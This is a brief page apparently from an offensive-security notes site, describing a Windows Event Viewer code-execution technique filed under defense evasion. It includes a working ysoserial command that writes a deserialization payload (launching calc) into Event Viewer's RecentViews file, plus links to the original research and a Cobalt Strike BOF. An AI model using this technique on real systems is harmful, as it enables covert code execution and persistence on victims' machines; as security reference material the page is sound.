The Void 🌌

Windows Event Viewer RCE

Jan 19, 19701 min read

Secondary Categories: 02-Defense Evasion

Description:

This technique will execute a command that is specified from the ysoserial compiler to execute on Windows Event Viewer

https://github.com/pwntester/ysoserial.net

ysoserial.exe -o raw -f BinaryFormatter -g Dataset -c calc > "C:\Users\Research\AppData\Local\Microsoft\Event Viewer\RecentViews"

Resources:

TitleURL
Original Security Researcher findinghttps://twitter.com/orange_8361/status/1518970259868626944
ysoserial repo with exehttps://github.com/pwntester/ysoserial.net
Cobalt Strike BOFhttps://twitter.com/ntlmrelay/status/1521821603746750465?s=09

Also Check Out:

Graph View

Backlinks

  • No backlinks found

Recent Blog Posts

Recent Blog Posts